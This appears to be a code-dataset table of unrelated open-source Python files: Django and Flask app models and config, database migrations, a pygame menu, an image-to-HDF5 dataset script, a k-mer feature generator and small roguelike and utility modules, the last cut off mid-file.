code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField
from django.utils.encoding import python_2_unicode_compatible
from transcriptic_tools import utils
from transcriptic_tools.utils import _CONTAINER_TYPES
from transcriptic_tools.enums import Temperature, CustomEnum
from django.core.exceptions import PermissionDenied
from autoprotocol import Unit
from transcriptic_tools.utils import round_volume
from db_file_storage.model_utils import delete_file, delete_file_if_needed
from helper_funcs import str_respresents_int
#create token imports
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from django.conf import settings
COVER_TYPES = set()
for container_type in _CONTAINER_TYPES.values():
if container_type.cover_types:
COVER_TYPES.update(container_type.cover_types)
COVER_TYPES = list(COVER_TYPES)
CONTAINER_STATUS_CHOICES = ['available','destroyed','returned','inbound','outbound','pending_destroy']
TEMPERATURE_NAMES = [temp.name for temp in Temperature]
RUN_STATUS_CHOICES = ['accepted','in_progress','complete','aborted','canceled']
ALIQUOT_EFFECT_TYPES = ['liquid_transfer_in','liquid_transfer_out','instructions']
DATA_TYPES = ['image_plate','platereader','measure']
RESOURCE_KINDS = ['Reagent','NucleicAcid']
DEFAULT_ORGANIZATION = 1
@python_2_unicode_compatible
class Organization(models.Model):
name = models.CharField(max_length=200,blank=True,
default='')
subdomain = models.CharField(max_length=200,
unique=True,
db_index=True)
users = models.ManyToManyField(User,
related_name='organizations',
related_query_name='orgnization',
db_constraint=True)
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
#custom fields
updated_at = models.DateTimeField(auto_now=True)
def get_absolute_url(self):
return "/%s/" % self.subdomain
def __str__(self):
return self.name if self.name else 'Organization %s'%self.id
@python_2_unicode_compatible
class Project(models.Model):
name = models.CharField(max_length=200,null=True,blank=True)
bsl = models.IntegerField(default=1,blank=False,null=False)
organization = models.ForeignKey(Organization, on_delete=models.CASCADE,
related_name='projects',
related_query_name='project',
db_constraint=True,
default=DEFAULT_ORGANIZATION
)
archived_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
#custom fields
updated_at = models.DateTimeField(auto_now=True)
def get_absolute_url(self):
return "/%s/%s/runs"%(self.organization.subdomain,
self.id)
def __str__(self):
return self.name if self.name else 'Project %s'%self.id
class RunContainer(models.Model):
run = models.ForeignKey('Run', on_delete=models.CASCADE,
db_constraint=True,
related_name='run_containers',
related_query_name='run_container',
)
container = models.ForeignKey('Container', on_delete=models.CASCADE,
db_constraint=True,
related_name='run_containers',
related_query_name='run_container',
)
#the local label of the container within the run
container_label = models.CharField(max_length=200)
class Meta:
unique_together = ('run', 'container_label', )
@python_2_unicode_compatible
class Run(models.Model):
title = models.CharField(max_length=1000,null=True,blank=True)
status = models.CharField(max_length=200,
choices=zip(RUN_STATUS_CHOICES,
RUN_STATUS_CHOICES),
null=False,
default='accepted',
blank=False)
test_mode = models.BooleanField(blank=False,default=False)
project = models.ForeignKey(Project, on_delete=models.CASCADE,
related_name='runs',
related_query_name='run',
db_constraint=True
)
owner = models.ForeignKey(User)
completed_at = models.DateTimeField(null=True, blank=True)
canceled_at = models.DateTimeField(null=True, blank=True)
aborted_at = models.DateTimeField(null=True, blank=True)
started_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
flagged = models.BooleanField(default=False,null=False)
properties = JSONField(null=True,blank=True,
default=dict)
protocol = JSONField(null=True,blank=True)
#we don't know what issued means
updated_at = models.DateTimeField(auto_now=True)
containers = models.ManyToManyField('Container', related_name='runs',
related_query_name='run',
through='RunContainer',
db_constraint=True,
null=True,
blank=True)
def add_container(self, container_or_container_id, label):
if isinstance(container_or_container_id,Container):
RunContainer.objects.create(run=self,
container=container_or_container_id,
container_label = label
)
else:
RunContainer.objects.create(run=self,
container_id=container_or_container_id,
container_label = label
)
def remove_container(self,container_or_container_id):
if isinstance(container_or_container_id, Container):
RunContainer.objects.filter(run=self,
container=container_or_container_id).delete()
else:
RunContainer.objects.filter(run=self,
container_id=container_or_container_id).delete()
def save(self, *args, **kw):
new_run = False
if self.id is not None:
orig_run = Run.objects.get(id=self.id)
if orig_run.protocol != self.protocol:
raise Exception, "unable to edit autoprotocol on a run"
if not self.title:
self.name = 'Run %s'%self.id
#new run
else:
new_run = True
self.convert_transcriptic_resource_ids()
if not isinstance(self.properties,dict):
self.properties = {}
assert self.status in RUN_STATUS_CHOICES,\
'status \'%s\' not found in allowed options %s'%(self.status, str(RUN_STATUS_CHOICES))
super(Run, self).save(*args, **kw)
#only hit if this is a new Run
if not self.title:
self.title = self.name = 'Run %s'%self.id
super(Run, self).save(*args, **kw)
if new_run:
self.create_instructions()
self.populate_containers()
def convert_transcriptic_resource_ids(self):
for operation in self.protocol['instructions']:
if operation['op'] != 'provision': continue
if not isinstance(operation['resource_id'], basestring) or \
str_respresents_int(operation['resource_id']): continue
resource = Resource.objects.get(transcriptic_id = operation['resource_id'])
operation['resource_id'] = resource.id
def create_instructions(self):
for i, instruction_dict in enumerate(self.protocol['instructions']):
instruction = Instruction.objects.create(run = self,
operation = instruction_dict,
sequence_no = i)
def populate_containers(self):
organization = self.project.organization
for label, ref_dict in self.protocol['refs'].items():
if 'new' in ref_dict:
storage_condition = ref_dict['store']['where'] if 'store' in ref_dict else None
new_container = Container.objects.create(container_type_id = ref_dict['new'],
label = label,
test_mode = self.test_mode,
storage_condition = storage_condition,
status = 'available',
generated_by_run = self,
organization = organization
)
self.add_container(new_container, label=label)
else:
#check that the existing container belongs to this org
existing_container = Container.objects.get(id=ref_dict['id'])
if existing_container.status == 'destroyed':
raise Exception('Destoryed container referenced in run: Container id %s'%existing_container.id)
if existing_container.organization_id != self.project.organization_id:
raise PermissionDenied('Container %s doesn\'t belong to your org'%existing_container.id)
self.add_container(existing_container, label=label)
def __str__(self):
return self.title
def get_absolute_url(self):
return "/%s/%s/runs/%s"%(self.project.organization.subdomain,
self.project_id, self.id)
class Meta:
index_together = [
['project','test_mode','status']
]
@python_2_unicode_compatible
class Container(models.Model):
#transcriptic fields
container_type_id = models.CharField(max_length=200,
choices=zip(_CONTAINER_TYPES.keys(),
_CONTAINER_TYPES.keys()))
barcode = models.IntegerField(blank=True,null=True,unique=True, db_index=True)
cover = models.CharField(max_length=200,
blank=True,
null=True,
choices=zip(COVER_TYPES,
COVER_TYPES))
test_mode = models.BooleanField(blank=False,default=False)
label = models.CharField(max_length=1000,
blank=True,
default='',
db_index=True
)
#location_id
storage_condition = models.CharField(max_length=200,
choices=zip(TEMPERATURE_NAMES,TEMPERATURE_NAMES),
default=Temperature.ambient.name,
null=True,
blank=True)
status = models.CharField(max_length=200,
choices=zip(CONTAINER_STATUS_CHOICES,
CONTAINER_STATUS_CHOICES),
null=False,
default='available',
blank=False)
expires_at = models.DateTimeField(null=True, blank=True)
properties = JSONField(null=True,blank=True,
default=dict)
generated_by_run = models.ForeignKey(Run, on_delete=models.CASCADE,
related_name='generated_containers',
related_query_name='generated_container',
db_constraint=True,
null=True,
blank=True
)
organization = models.ForeignKey(Organization, on_delete=models.CASCADE,
related_name='containers',
related_query_name='container',
db_constraint=True
)
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
#custom fields
updated_at = models.DateTimeField(auto_now=True)
@classmethod
def get_container_from_run_and_container_label(cls, run_id, container_label):
return cls.objects.get(run_container__run_id = run_id,
run_container__container_label = container_label)
@property
def col_count(self):
container_type = _CONTAINER_TYPES[self.container_type_id]
return container_type.col_count
@property
def row_count(self):
container_type = _CONTAINER_TYPES[self.container_type_id]
return container_type.row_count()
def well_indexes_from(self, start, num, columnwise=False):
"""
Return a list of indexes belonging to this Container starting from
the index indicated (in integer or string form) and including the
number of proceeding wells specified. well indexes are counted from the
starting well rowwise unless columnwise is True.
Parameters
----------
start : Well, int, str
Starting well specified as a Well object, a human-readable well
index or an integer well index.
num : int
Number of wells to include in the Wellgroup.
columnwise : bool, optional
Specifies whether the wells included should be counted columnwise
instead of the default rowwise.
"""
container_type = _CONTAINER_TYPES[self.container_type_id]
start = container_type.robotize(start)
if columnwise:
row, col = container_type.decompose(start)
num_rows = self.row_count
start = col * num_rows + row
return range(start,start + num)
def get_absolute_url(self):
return "/%s/containers/%s"%(self.organization.subdomain,
self.id)
def get_column_well_indexes(self, column_index_or_indexes):
if isinstance(column_index_or_indexes,list):
result = []
for column_index in column_index_or_indexes:
result+=self.get_column_wells(self, column_index)
return result
column_index = column_index_or_indexes
num_cols = self.col_count
num_rows = self.row_count
if column_index >= num_cols:
raise ValueError('column index %s is too high, only %s cols in this container'%(column_index,num_cols))
start = num_rows*column_index
return self.all_well_indexes(columnwise=True)[start:start+num_rows]
def all_well_indexes(self, columnwise=False):
"""
Return a list of indexes representing all Wells belonging to this Container.
Parameters
----------
columnwise : bool, optional
returns the WellGroup columnwise instead of rowwise (ordered by
well index).
"""
if columnwise:
num_cols = self.col_count
num_rows = self.row_count
return [row * num_cols + col
for col in xrange(num_cols)
for row in xrange(num_rows)]
else:
return range(0,self.col_count*self.row_count)
def save(self, *args, **kwargs):
if self.barcode == '':
self.barcode = None
if self.expires_at == '':
self.expires_at = None
if self.generated_by_run == '':
self.generated_by_run = None
if self.generated_by_run_id:
#check that the project of the generated run and the current org are the same
assert self.generated_by_run.project.organization_id == self.organization_id, "Can't use a container from one org in another org's run"
if not isinstance(self.properties,dict):
self.properties = {}
super(Container, self).save(*args, **kwargs)
def __str__(self):
return '%s (%s)'%(self.label,self.id) if self.label else 'Container %s'%self.id
@python_2_unicode_compatible
class Aliquot(models.Model):
name = models.CharField(max_length=200,null=True,blank=True)
container = models.ForeignKey(Container, on_delete=models.CASCADE,
related_name='aliquots',
related_query_name='aliquot',
db_constraint=True
)
well_idx = models.IntegerField(default=0,blank=False, null=False)
#this is a string to keep precision
volume_ul = models.CharField(max_length=200,null=False,default='0',blank=False)
properties = JSONField(null=True,blank=True,
default=dict)
#resource
#lot_no
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
#custom fields
updated_at = models.DateTimeField(auto_now=True)
@property
def human_index(self):
container_type = _CONTAINER_TYPES[self.container.container_type_id]
return container_type.humanize(self.well_idx)
def add_volume(self, volume_to_add):
"""
Handles volume strings, e.g. '5:nanoliter'
"""
current_volume = Unit(self.volume_ul,'microliter')
if isinstance(volume_to_add,basestring) and ':' in volume_to_add:
added_volume = Unit(volume_to_add)
else:
added_volume = Unit(volume_to_add,'microliter')
added_volume = round_volume(added_volume,2)
#instruments have at most 0.00uL precision
new_volume = round_volume(current_volume+added_volume,2)
self.volume_ul = str(new_volume.to('microliter').magnitude)
return added_volume
def subtract_volume(self, volume_to_add):
"""
Handles volume strings, e.g. '5:nanoliter'
"""
current_volume = Unit(self.volume_ul,'microliter')
if isinstance(volume_to_add,basestring) and ':' in volume_to_add:
subtracted_volume = Unit(volume_to_add)
else:
subtracted_volume = Unit(volume_to_add,'microliter')
return self.add_volume(-1*subtracted_volume)
def save(self,*args, **kwargs):
if not isinstance(self.properties,dict):
self.properties = {}
super(Aliquot, self).save(*args, **kwargs)
def __str__(self):
return '%s/%s'%(self.container.label,self.well_idx)
@python_2_unicode_compatible
class Instruction(models.Model):
run = models.ForeignKey(Run,
on_delete=models.CASCADE,
related_name='instructions',
related_query_name='instruction',
db_constraint=True)
operation = JSONField(blank=True,null=True)
sequence_no = models.IntegerField(null=False,blank=False,
default=0)
started_at = models.DateTimeField(null=True, blank=True)
completed_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
unique_together = ('run', 'sequence_no',)
def __str__(self):
return 'Instruction %s'%self.id
class DataImage(models.Model):
bytes = models.TextField()
filename = models.CharField(max_length=255)
mimetype = models.CharField(max_length=50)
class DataFile(models.Model):
bytes = models.TextField()
filename = models.CharField(max_length=255)
mimetype = models.CharField(max_length=50)
@python_2_unicode_compatible
class Data(models.Model):
name = models.CharField(max_length=200,null=True)
data_type = models.CharField(max_length=200,
choices=zip(DATA_TYPES,
DATA_TYPES),
null=False,
default='available',
blank=False)
sequence_no = models.IntegerField(null=False,blank=False,
default=0)
#upload_to isn't used but is required
image = models.ImageField(upload_to='autolims.DataImage/bytes/filename/mimetype', null=True, blank=True)
file = models.FileField(upload_to='autolims.DataFile/bytes/filename/mimetype', null=True, blank=True)
json = JSONField(null=True,blank=True)
instruction = models.ForeignKey(Instruction,
on_delete=models.CASCADE,
related_name='data',
related_query_name='data',
db_constraint=True,
null=True,
blank=True)
run = models.ForeignKey(Run, on_delete=models.CASCADE,
related_name='data',
related_query_name='data',
db_constraint=True,
null=True,
blank=True
)
class Meta:
unique_together = ('run', 'sequence_no',)
verbose_name_plural = "data"
def save(self, *args, **kwargs):
if self.run and self.instruction and self.run_id != self.instruction.run_id:
raise Exception, "Instruction must belong to the run of this data object"
super(Data, self).save(*args, **kwargs)
delete_file_if_needed(self, 'file')
delete_file_if_needed(self, 'image')
def delete(self, *args, **kwargs):
super(Data, self).delete(*args, **kwargs)
delete_file(self, 'file')
delete_file(self, 'image')
def __str__(self):
return "Data %s"%self.id
@python_2_unicode_compatible
class AliquotEffect(models.Model):
#visible in network console as aliquot_effects when loading a well at transcriptic
aliquot = models.ForeignKey(Aliquot,
on_delete=models.CASCADE,
related_name='aliquot_effects',
related_query_name='aliquot_effect',
db_constraint=True)
instruction = models.ForeignKey(Instruction, on_delete=models.CASCADE,
related_name='aliquot_effects',
related_query_name='aliquot_effect',
db_constraint=True)
data = JSONField(blank=True,null=True)
type = models.CharField(max_length=200,
choices=zip(ALIQUOT_EFFECT_TYPES,
ALIQUOT_EFFECT_TYPES),
null=False,
default=ALIQUOT_EFFECT_TYPES[0],
blank=False)
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return 'Aliquot Effect %s'%self.id
@python_2_unicode_compatible
class Resource(models.Model):
name = models.CharField(max_length=200,blank=True,
default='')
description = models.TextField(blank=True,null=True)
storage_condition = models.CharField(max_length=200,
choices=zip(TEMPERATURE_NAMES,TEMPERATURE_NAMES),
default=Temperature.ambient.name,
null=True,
blank=True)
sensitivities = JSONField(null=True,blank=True,
default=list)
properties = JSONField(null=True,blank=True,
default=dict)
kind = models.CharField(max_length=200,
choices=zip(RUN_STATUS_CHOICES,
RUN_STATUS_CHOICES),
null=False,
default='available',
blank=False)
transcriptic_id = models.CharField(max_length=200,blank=True,null=True,
default='', db_index=True,
unique=True)
deleted_at = models.DateTimeField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
def __str__(self):
return self.name if self.name else 'Resource %s'%self.id
def save(self, *args, **kwargs):
if self.transcriptic_id == '':
self.transcriptic_id = None
if not isinstance(self.sensitivities,list):
self.sensitivities = []
if not isinstance(self.properties,dict):
self.properties = []
super(Resource, self).save(*args, **kwargs)
#@python_2_unicode_compatible
#class Kit(models.Model):
#https://secure.transcriptic.com/_commercial/kits?format=json
#@python_2_unicode_compatible
#class KitItem(models.Model):
#https://secure.transcriptic.com/_commercial/kits/kit19jybkyf8ddv/kit_items?format=json
# This code is triggered whenever a new user has been created and saved to the database
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
|
scottbecker/autolims
|
autolims/models.py
|
Python
|
mit
| 28,120
|
import numpy
from os import listdir
from os.path import isfile, join
import h5py
import numpy
from scipy import misc
rng = numpy.random.RandomState(123522)
path = '/data/lisatmp3/xukelvin/'
if __name__ == "__main__":
files = [f for f in listdir(join('train'))
if isfile(join('train', f))]
# Shuffle examples around
rng.shuffle(files)
# Create HDF5 file
# train
print "Processing Train"
train_f = h5py.File(path+'dogs_vs_cats_train.hdf5', 'w')
dt = h5py.special_dtype(vlen=numpy.dtype('uint8'))
features = train_f.create_dataset('images', (20000,), dtype=dt)
shapes = train_f.create_dataset('shapes', (20000, 3), dtype='uint16')
targets = train_f.create_dataset('labels', (20000,), dtype='uint8')
for i in xrange(0,20000):
f = files[i]
image = misc.imread(join('train', f))
target = 0 if 'cat' in f else 1
features[i] = image.flatten()
targets[i] = target
shapes[i] = image.shape
print '{:.0%}\r'.format(i / 20000.),
# val
print "Processing Validation"
val_f = h5py.File(path+'dogs_vs_cats_val.hdf5', 'w')
dt = h5py.special_dtype(vlen=numpy.dtype('uint8'))
features = val_f.create_dataset('images', (2500,), dtype=dt)
shapes = val_f.create_dataset('shapes', (2500, 3), dtype='uint16')
targets = val_f.create_dataset('labels', (2500,), dtype='uint8')
for i in xrange(20000,22500):
f = files[i]
image = misc.imread(join('train', f))
target = 0 if 'cat' in f else 1
features[i-20000] = image.flatten()
targets[i-20000] = target
shapes[i-20000] = image.shape
print '{:.0%}\r'.format(i / 2500.),
# test
print "Processing Test"
test_f = h5py.File(path+'dogs_vs_cats_test.hdf5', 'w')
dt = h5py.special_dtype(vlen=numpy.dtype('uint8'))
features = test_f.create_dataset('images', (2500,), dtype=dt)
shapes = test_f.create_dataset('shapes', (2500, 3), dtype='uint16')
targets = test_f.create_dataset('labels', (2500,), dtype='uint8')
for i in xrange(22500,25000):
f = files[i]
image = misc.imread(join('train', f))
target = 0 if 'cat' in f else 1
features[i-22500] = image.flatten()
targets[i-22500] = target
shapes[i-22500] = image.shape
print '{:.0%}\r'.format(i / 2500.),
|
kelvinxu/representation-learning
|
generate_dataset.py
|
Python
|
mit
| 2,368
|
"""empty message
Revision ID: dde8a74cfffa
Revises: 0c2841d4cfcd
Create Date: 2016-07-29 17:42:17.142867
"""
# revision identifiers, used by Alembic.
revision = 'dde8a74cfffa'
down_revision = '0c2841d4cfcd'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('podcast', sa.Column('language', sa.String(length=5), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('podcast', 'language')
### end Alembic commands ###
|
perna/podigger
|
migrations/versions/dde8a74cfffa_.py
|
Python
|
mit
| 618
|
# -*- coding: utf-8 -*-
# !/usr/bin/python
import pygame
from classes.pre_game.pre_game_item import PreGameItem
class PreGame():
def __init__(self, screen, actions, players):
# Screen für Instanz definieren
self.screen = screen
self.screen_width = self.screen.get_rect().width
self.screen_height = self.screen.get_rect().height
# Actions
self.actions = actions
# vorhandene Player-Namen
self.recent_players = players
# Validierungsfehler
self.validation_error = False
# PreGameItems
self.pre_game_items = [
PreGameItem(
self.screen,
{'description': 'Spieler 1:'},
0,
0,
'bike-red-c'
),
PreGameItem(
self.screen,
{'description': 'Spieler 2:'},
0,
self.screen_height / 2,
'bike-blue-c'
)
]
# Aktiven Input festlegen (default: 0 => entspricht erstem Item)
self.active_input = 0
self.pre_game_items[self.active_input].activate_input()
self.active_color = (255, 134, 48)
self.active_cursor = '_'
def update(self, deltat):
self.validate_names()
for pre_game_item in self.pre_game_items:
pre_game_item.deactivate()
pre_game_item.update(deltat)
self.pre_game_items[self.active_input].activate()
def render(self, deltat):
for pre_game_item in self.pre_game_items:
pre_game_item.render(deltat)
def handle_keypress(self, event):
if event.unicode.isalpha():
self.pre_game_items[self.active_input].append_key(event.unicode)
elif event.key == pygame.K_BACKSPACE:
self.pre_game_items[self.active_input].delete_last_char()
elif event.key == pygame.K_RETURN:
if not self.validation_error:
self.actions['success']()
elif event.key == pygame.K_ESCAPE:
self.actions['cancel']()
elif event.key == pygame.K_DOWN:
self.increment_active_item()
elif event.key == pygame.K_UP:
self.decrement_active_item()
def set_active_item(self, input_number):
self.active_input = input_number
def increment_active_item(self):
self.pre_game_items[self.active_input].deactivate_input()
if self.active_input < len(self.pre_game_items) - 1:
self.active_input += 1
else:
self.active_input = 0
self.pre_game_items[self.active_input].activate_input()
def decrement_active_item(self):
self.pre_game_items[self.active_input].deactivate_input()
if self.active_input > 0:
self.active_input -= 1
else:
self.active_input = len(self.pre_game_items) - 1
self.pre_game_items[self.active_input].activate_input()
def validate_names(self):
error = False
for pregame_item in self.pre_game_items:
if pregame_item.input_text == '':
error = True
if error:
self.validation_error = True
else:
self.validation_error = False
|
timlapluie/gldsprnt
|
classes/pre_game/pre_game.py
|
Python
|
mit
| 3,265
|
import numpy as np
import itertools
import timeit
import time
import pdb
def form_all_kmers(A,k):
"""
Given an alphabet and `k`, this forms an array
of all possible k-mers using that alphabet.
Arguments
A : list
alphabet - all possible characters
k : int
the length of subsequences you're after
Returns
beta : array
all possible kmers that can be formed by the alphabet A
"""
all_kmers = itertools.product(A,repeat=k)
return np.array([beta for beta in all_kmers])
def form_all_kmers_in_string(k,x):
"""
Given a string and `k`, this forms all k-mers
that occur in that string.
Arguments
k : int
the length of the subseqeunces you're after
x : string
the string from which you'd like to form all kmers
Older code
>>> strings = np.empty((k, len(x)-k), dtype=str)
>>> x = list(x)
>>> for i in range(k):
>>> strings[i,:] = x[i:-(k-i)]
>>> # this is all the kmers
>>> return np.unique([''.join(kmer) for kmer in strings.T if '*' not in kmer])
.. note::
Code implemented is much faster than older code,
particularly since it uses list comprehensions.
"""
kmers = np.unique([x[i:i+k] for i in xrange(len(x)-k) if '*' not in x[i:i+k]])
return kmers
def gen_features(x,m,beta):
"""
a feature of `x` is the count in `x` of each kmer in `beta`, where the
kmers in `x` are allowed to mismatch each element of beta by `m`
mismatches.
Arguments
x : list
protein sequence
m : int
number of allowed mismatches
beta : array
all possible kmers
Returns
features : array
count in `x` of each kmer in `beta` varying by `m` mismatches.
"""
k = len(beta[0])
y = np.array([list(yi) for yi in form_all_kmers_in_string(k, x)])
b = np.array([list(bi) for bi in beta])
B = len(beta)
print "beta contains %s kmers"%B
print "the current string contains %s kmers"%len(y)
starttime = time.time()
count = np.zeros((len(beta),m),dtype=np.int16)
ms = np.arange(m).reshape(1,m)
for yi in y:
count += ((yi!=b).sum(1).reshape(B,1)<=ms)
print "Feature generation time = %.4f" % (time.time() - starttime)
return count
|
rajanil/mkboost
|
src/mismatch.py
|
Python
|
mit
| 2,433
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard-to-guess-key'
SQLALCHEMY_COMMIT_TEARDOWN = True
MAIL_SERVER = 'smtp@qq.com'
MAIL_PORT = 25
MAIL_USER_TLS = False
MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
FLASKY_MAIL_SUBJECT_PREFIX = '[Flasky]'
FLASKY_MAIL_SENDER = 'Flasky Admin <flasky@example.com>'
FLASKY_ADMIN = os.environ.get('FLASKY_ADMIN')
FLASKY_POSTS_PER_PAGE = 10
FLASKY_FOLLOWERS_PER_PAGE = 10
FLASKY_COMMENTS_PER_PAGE = 10
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URI') or \
'sqlite:///' + os.path.join(basedir,'data-dev.sqlite')
class TestingConfig(Config):
TESTING = True
WTF_CSRF_ENABLED = False
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URI') or \
'sqlite:///' + os.path.join(basedir,'data-test.sqlite')
class ProductionConfig(Config):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URI') or \
'sqlite:///' + os.path.join(basedir,'data.sqlite')
config = {
'development' : DevelopmentConfig,
'testing' : TestingConfig,
'production' : ProductionConfig,
'default' : DevelopmentConfig
}
|
chenke91/LearnFlask
|
config.py
|
Python
|
mit
| 1,387
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Buffer',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('description', models.TextField()),
('refresh_rate', models.FloatField()),
('created', models.DateField()),
('updated', models.DateField()),
('state', models.BooleanField(default=True)),
('label', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Building',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('category', models.CharField(max_length=200)),
('code', models.IntegerField(default=0)),
('longitude', models.FloatField(default=0.0)),
('latitude', models.FloatField(default=0.0)),
('surface', models.FloatField(default=0.0)),
('floors', models.IntegerField(default=1)),
('volume', models.FloatField(default=0.0)),
('kWh', models.FloatField(default=0.0)),
('kWh_m2', models.IntegerField(default=0.0)),
('kW', models.FloatField(default=0.0)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Counter',
fields=[
('buffer_ptr', models.OneToOneField(serialize=False, auto_created=True, parent_link=True, to='myapp.Buffer', primary_key=True)),
],
options={
},
bases=('myapp.buffer',),
),
migrations.CreateModel(
name='ElectricVehicle',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('code', models.IntegerField(default=0)),
('municipality', models.CharField(max_length=200)),
('streets', models.CharField(max_length=200)),
('postcode', models.IntegerField(default=0)),
('longitude', models.IntegerField(default=1)),
('latitude', models.IntegerField(default=1)),
('map_area', models.IntegerField(default=0)),
('power', models.FloatField(default=0.0)),
('type', models.CharField(max_length=200)),
('kWh', models.FloatField(default=0.0)),
('kWh_user', models.FloatField(default=0.0)),
('total_charging_points', models.IntegerField(default=0)),
('available_charging_points', models.IntegerField(default=0)),
('tn', models.FloatField(default=0.0)),
('tn_kWh_user', models.FloatField(default=0.0)),
('euro_user', models.FloatField(default=0.0)),
('monthly_expenses', models.FloatField(default=0.0)),
('forecast_expenses', models.FloatField(default=0.0)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Plug',
fields=[
('buffer_ptr', models.OneToOneField(serialize=False, auto_created=True, parent_link=True, to='myapp.Buffer', primary_key=True)),
],
options={
},
bases=('myapp.buffer',),
),
migrations.CreateModel(
name='Sensor',
fields=[
('buffer_ptr', models.OneToOneField(serialize=False, auto_created=True, parent_link=True, to='myapp.Buffer', primary_key=True)),
],
options={
},
bases=('myapp.buffer',),
),
migrations.CreateModel(
name='StreetLighting',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Value',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, verbose_name='ID', primary_key=True)),
('timestamp', models.DateField(auto_now_add=True)),
('metric', models.TextField()),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='sensor',
name='values',
field=models.ManyToManyField(blank=True, to='myapp.Value', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='ampere',
field=models.OneToOneField(to='myapp.Value', related_name='7'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwatt',
field=models.OneToOneField(to='myapp.Value', related_name='1'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwh1',
field=models.OneToOneField(to='myapp.Value', related_name='2'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwh2',
field=models.OneToOneField(to='myapp.Value', related_name='3'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwh3',
field=models.OneToOneField(to='myapp.Value', related_name='4'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='kwhtotal',
field=models.OneToOneField(to='myapp.Value', related_name='5'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='pf',
field=models.OneToOneField(to='myapp.Value', related_name='8'),
preserve_default=True,
),
migrations.AddField(
model_name='counter',
name='voltage',
field=models.OneToOneField(to='myapp.Value', related_name='6'),
preserve_default=True,
),
]
|
mpetyx/energagement
|
energagement/myapp/migrations/0001_initial.py
|
Python
|
mit
| 6,753
|
# -*- coding: utf-8 -*-
"""Functions called when player or monsters dies."""
import colors
from random import randint
from game_messages import Message
from game_states import GameStates
from render_functions import RenderOrder
from texts import Texts
def kill_player(player):
"""Change player's properties and return death message."""
player.char = '%'
player.color = colors.get('white')
player.base_name = 'remains of ' + 'YOU'
player.tile_path = 'fighter/blood{}.png'.format(randint(1, 5))
return Message(Texts.get_text('player_death_log'), colors.get('red')), GameStates.PLAYER_DEAD
def kill_monster(monster):
"""Change monster's properties and return death message."""
if monster.name == 'the sorceress':
death_message = Message(Texts.get_text(
'boss_death', monster.name.title()), colors.get('red'))
else:
txt = Texts.get_text('monster_death', Texts.get_text(monster.name).title())
death_message = Message(txt, colors.get('orange'))
monster.char = '%'
monster.color = colors.get('white')
monster.blocks = False
monster.fighter = None
monster.ai = None
monster.base_name = 'remains of ' + monster.name
monster.tile_path = 'fighter/blood{}.png'.format(randint(1, 5))
monster.render_order = RenderOrder.CORPSE
return death_message
|
kuraha4/roguelike-tutorial-python
|
src/death_functions.py
|
Python
|
mit
| 1,349
|
# old_python.py
class OldPython(object):
def __init__(self, age):
if age < 50:
raise ValueError("%d isn't old" % age)
self.age = age
def hiss(self):
if self.age < 60:
return "sss sss"
elif self.age < 70:
return "SSss SSss"
else:
return "sss... *cough* *cough*"
|
evandrix/Splat
|
doc/existing-work/pythoscope/wild_pythons/old_python.py
|
Python
|
mit
| 359
|
class TodoooError(Exception):
"""Catch all error for the Todooo application"""
pass
class InvalidCommandError(TodoooError):
"""An error where the command is not recognized by the REPL"""
def __str__(self):
return 'You entered an invalid command'
class NoListError(TodoooError):
